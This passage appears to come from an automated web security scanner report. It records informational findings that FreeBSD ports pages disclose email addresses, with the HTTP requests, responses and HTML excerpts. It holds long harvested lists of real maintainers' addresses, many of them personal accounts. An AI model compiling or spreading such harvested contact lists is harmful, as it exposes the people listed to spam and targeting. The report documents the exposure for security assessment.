<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dryice@dryice.name">dryice@dryice.name</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:davide.italiano@gmail.com">davide.italiano@gmail.com</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rfarmer@predatorlabs.net">rfarmer@predatorlabs.net</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lx@FreeBSD.org">lx@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:admin@mjbrune.org">admin@mjbrune.org</A>
...[SNIP]...
<A HREF="mailto:trebestie@gmail.com">trebestie@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ant@monitor.deis.unical.it">ant@monitor.deis.unical.it</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:buganini@gmail.com">buganini@gmail.com</A>
...[SNIP]...
<A HREF="mailto:jille@quis.cx">jille@quis.cx</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joerg@FreeBSD.org">joerg@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gj@FreeBSD.org">gj@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:aldis@bsdroot.lv">aldis@bsdroot.lv</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vmagerya@gmail.com">vmagerya@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:saper@SAPER.INFO">saper@SAPER.INFO</A>
...[SNIP]...
<A HREF="mailto:jjuanino@gmail.com">jjuanino@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gj@FreeBSD.org">gj@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:citycat4@ngs.ru">citycat4@ngs.ru</A>
...[SNIP]...
<A HREF="mailto:martymac@FreeBSD.org">martymac@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:exile@chamber.ee">exile@chamber.ee</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rafan@FreeBSD.org">rafan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:culot@FreeBSD.org">culot@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mike@mikelockwood.com">mike@mikelockwood.com</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...

24.312. http://www.freebsd.org/ports/ftp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/ftp.html

Issue detail

The following email addresses were disclosed in the response:

acm@FreeBSD.org
admin@lissyara.su
ale@FreeBSD.org
alepulver@FreeBSD.org
anders@FreeBSD.org
avk@vl.ru
avl@FreeBSD.org
beech@FreeBSD.org
brooks@FreeBSD.org
c.petrik.sosa@gmail.com
cejkar@fit.vutbr.cz
chip-set@mail.ru
chrissicool@chrissicool.net
danger@FreeBSD.org
demon@FreeBSD.org
dhn@FreeBSD.org
dinoex@FreeBSD.org
ehaupt@FreeBSD.org
emulation@FreeBSD.org
freebsdports@chillibear.com
gahr@FreeBSD.org
garga@FreeBSD.org
gelraen.ua@gmail.com
guzik@anka.net.pl
haskell@FreeBSD.org
hopet@ics.muni.cz
hrs@FreeBSD.org
ijliao@FreeBSD.org
ilya.otyutskiy@gmail.com
jharris@widomaker.com
jnlin@csie.nctu.edu.tw
johans@FreeBSD.org
jsa@FreeBSD.org
jupengfei@gmail.com
kevlo@FreeBSD.org
kiwi@oav.net
kuriyama@FreeBSD.org
lwhsu@FreeBSD.org
lx@FreeBSD.org
makc@FreeBSD.org
mandree@FreeBSD.org
marius@FreeBSD.org
markus@FreeBSD.org
martymac@FreeBSD.org
miwi@FreeBSD.org
mm@FreeBSD.org
novel@FreeBSD.org
obrien@FreeBSD.org
oliver@FreeBSD.org
perl@FreeBSD.org
philippe@le-berre.com
ports@FreeBSD.org
prudhvi-krishna-bsd@surapaneni.in
rfarmer@predatorlabs.net
roam@FreeBSD.org
ryan@wonko.com
sam@brj.pp.ru
sem@FreeBSD.org
sexbear@tmu.edu.tw
skv@FreeBSD.org
skynick@mail.sc.ru
stas@FreeBSD.org
sumikawa@FreeBSD.org
sylvio@FreeBSD.org
thierry@FreeBSD.org
tmclaugh@FreeBSD.org
tmseck@netcologne.de
tung@turtle.ee.ncku.edu.tw
uqs@FreeBSD.org
vd@FreeBSD.org
wenheping@gmail.com

Request

GET /ports/ftp.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1534656558"
Last-Modified: Sun, 23 Jan 2011 02:29:30 GMT
Content-Length: 251119
Connection: close
Date: Mon, 24 Jan 2011 16:16:41 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Ftp</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/htm
...[SNIP]...
<A HREF="mailto:c.petrik.sosa@gmail.com">c.petrik.sosa@gmail.com</A>
...[SNIP]...
<A HREF="mailto:danger@FreeBSD.org">danger@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kevlo@FreeBSD.org">kevlo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:prudhvi-krishna-bsd@surapaneni.in">prudhvi-krishna-bsd@surapaneni.in</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c.petrik.sosa@gmail.com">c.petrik.sosa@gmail.com</A>
...[SNIP]...
<A HREF="mailto:hopet@ics.muni.cz">hopet@ics.muni.cz</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skynick@mail.sc.ru">skynick@mail.sc.ru</A>
...[SNIP]...
<A HREF="mailto:rfarmer@predatorlabs.net">rfarmer@predatorlabs.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:novel@FreeBSD.org">novel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:demon@FreeBSD.org">demon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jsa@FreeBSD.org">jsa@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kiwi@oav.net">kiwi@oav.net</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sem@FreeBSD.org">sem@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chrissicool@chrissicool.net">chrissicool@chrissicool.net</A>
...[SNIP]...
<A HREF="mailto:marius@FreeBSD.org">marius@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mandree@FreeBSD.org">mandree@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:marius@FreeBSD.org">marius@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tung@turtle.ee.ncku.edu.tw">tung@turtle.ee.ncku.edu.tw</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:philippe@le-berre.com">philippe@le-berre.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sem@FreeBSD.org">sem@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tmseck@netcologne.de">tmseck@netcologne.de</A>
...[SNIP]...
<A HREF="mailto:alepulver@FreeBSD.org">alepulver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ilya.otyutskiy@gmail.com">ilya.otyutskiy@gmail.com</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avl@FreeBSD.org">avl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beech@FreeBSD.org">beech@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:markus@FreeBSD.org">markus@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:markus@FreeBSD.org">markus@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:markus@FreeBSD.org">markus@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:martymac@FreeBSD.org">martymac@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alepulver@FreeBSD.org">alepulver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avk@vl.ru">avk@vl.ru</A>
...[SNIP]...
<A HREF="mailto:ryan@wonko.com">ryan@wonko.com</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:anders@FreeBSD.org">anders@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ijliao@FreeBSD.org">ijliao@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:guzik@anka.net.pl">guzik@anka.net.pl</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sexbear@tmu.edu.tw">sexbear@tmu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:alepulver@FreeBSD.org">alepulver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lx@FreeBSD.org">lx@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jharris@widomaker.com">jharris@widomaker.com</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wenheping@gmail.com">wenheping@gmail.com</A>
...[SNIP]...
<A HREF="mailto:lwhsu@FreeBSD.org">lwhsu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lwhsu@FreeBSD.org">lwhsu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jupengfei@gmail.com">jupengfei@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsdports@chillibear.com">freebsdports@chillibear.com</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jnlin@csie.nctu.edu.tw">jnlin@csie.nctu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:brooks@FreeBSD.org">brooks@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tmclaugh@FreeBSD.org">tmclaugh@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cejkar@fit.vutbr.cz">cejkar@fit.vutbr.cz</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:demon@FreeBSD.org">demon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chip-set@mail.ru">chip-set@mail.ru</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gelraen.ua@gmail.com">gelraen.ua@gmail.com</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vd@FreeBSD.org">vd@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sam@brj.pp.ru">sam@brj.pp.ru</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:uqs@FreeBSD.org">uqs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chip-set@mail.ru">chip-set@mail.ru</A>
...[SNIP]...
<A HREF="mailto:sumikawa@FreeBSD.org">sumikawa@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alepulver@FreeBSD.org">alepulver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:novel@FreeBSD.org">novel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...

24.313. http://www.freebsd.org/ports/lang.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/lang.html

Issue detail

The following email addresses were disclosed in the response:

acm@FreeBSD.org
admin@lissyara.su
aldis@bsdroot.lv
ale@FreeBSD.org
alepulver@FreeBSD.org
amakawa@jp.FreeBSD.org
amatus@gnu.org
amdmi3@FreeBSD.org
andrewb@cs.cmu.edu
araujo@FreeBSD.org
armin@frozen-zone.org
arved@FreeBSD.org
atrn@zeta.org.au
bapt@FreeBSD.org
berend@pobox.com
beyert@cs.ucr.edu
bf@FreeBSD.org
bkoenig@cs.tu-berlin.de
bob@eager.cx
brooks@FreeBSD.org
c.petrik.sosa@gmail.com
chromium@hybridsource.org
citric@cubicone.tmetic.com
clsung@FreeBSD.org
coumarin@gmail.com
cracauer@cons.org
danfe@FreeBSD.org
deischen@freebsd.org
devel@stasyan.com
devon.odell@gmail.com
dhn@FreeBSD.org
dinoex@FreeBSD.org
dk.diklab@gmail.com
ed@FreeBSD.org
edwin@mavetju.org
eg@fbsd.lt
emulation@FreeBSD.org
erik@bz.bzflag.bz
estrabd@gmail.com
fischer.frank@gmail.com
fjoe@FreeBSD.org
flo@smeets.im
freebsd-emulation@FreeBSD.org
freebsd-ports@coreland.ath.cx
g.gonter@ieee.org
gahr@FreeBSD.org
garga@FreeBSD.org
gerald@FreeBSD.org
gjb@FreeBSD.org
glarkin@FreeBSD.org
glewis@FreeBSD.org
gnome@FreeBSD.org
gslin@gslin.org
haskell@FreeBSD.org
him@richardkiss.com
housel@acm.org
hq@FreeBSD.org
jaapb@kerguelen.org
jasone@FreeBSD.org
java@FreeBSD.org
jesper.louis.andersen@gmail.com
jhay@FreeBSD.org
jimmy@mammothcheese.ca
jnlin@csie.nctu.edu.tw
joel@FreeBSD.org
joemann@beefree.free.de
joerg@FreeBSD.org
johans@FreeBSD.org
johnson.peter@gmail.com
jre@vineyard.net
jsa@FreeBSD.org
kaiw27@gmail.com
karel@lovetemple.net
katsuji.ishikawa@gmail.com
kde@FreeBSD.org
kevlo@FreeBSD.org
knu@FreeBSD.org
krion@FreeBSD.org
kris@FreeBSD.org
lev@FreeBSD.org
llwang@infor.org
lth@FreeBSD.org
lwhsu@FreeBSD.org
maho@FreeBSD.org
mainland@apeiron.net
mathiasp@virtual-earth.de
mi@aldan.algebra.com
michael.grunewald@laposte.net
micho@matem.unam.mx
milki@rescomp.berkeley.edu
mitsururike@gmail.com
mjs@Bur.st
mm@FreeBSD.org
mono@FreeBSD.org
mutoh@openedu.org
mva@FreeBSD.org
n.smoot@gmail.com
netj@sparcs.kaist.ac.kr
ninjin@kth.se
nivit@FreeBSD.org
nmh@t3x.org
novel@FreeBSD.org
numisemis@yahoo.com
obrien@FreeBSD.org
olgeni@FreeBSD.org
osa@FreeBSD.org
ozawa@ongs.co.jp
perl@FreeBSD.org
pete@twisted.org.uk
peter.schuller@infidyne.com
pgj@FreeBSD.org
pjdelport@gmail.com
pmn@bakarika.net
ports@FreeBSD.org
python@FreeBSD.org
rene@FreeBSD.org
rick@wzoeterwoude.net
rodrigo@bebik.net
ruby@FreeBSD.org
sahil@FreeBSD.org
saper@saper.info
saturnero@gufi.org
simon@olofsson.de
skv@FreeBSD.org
stas@FreeBSD.org
swills@FreeBSD.org
sylvio@FreeBSD.org
tdb@FreeBSD.org
thierry@FreeBSD.org
tijl@coosemans.org
tobez@FreeBSD.org
tsparks@appliedops.net
umq@ueo.co.jp
vanilla@FreeBSD.org
vlm@lionet.info
vmagerya@gmail.com
wblock@wonkity.com
wen@FreeBSD.org
wenheping@gmail.com
wes@FreeBSD.org

Request

GET /ports/lang.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1944216595"
Last-Modified: Sun, 23 Jan 2011 02:29:32 GMT
Content-Length: 1008409
Connection: close
Date: Mon, 24 Jan 2011 16:16:33 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Lang</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/ht
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bf@FreeBSD.org">bf@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fischer.frank@gmail.com">fischer.frank@gmail.com</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nmh@t3x.org">nmh@t3x.org</A>
...[SNIP]...
<A HREF="mailto:wblock@wonkity.com">wblock@wonkity.com</A>
...[SNIP]...
<A HREF="mailto:novel@FreeBSD.org">novel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vlm@lionet.info">vlm@lionet.info</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rene@FreeBSD.org">rene@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joerg@FreeBSD.org">joerg@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rene@FreeBSD.org">rene@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:simon@olofsson.de">simon@olofsson.de</A>
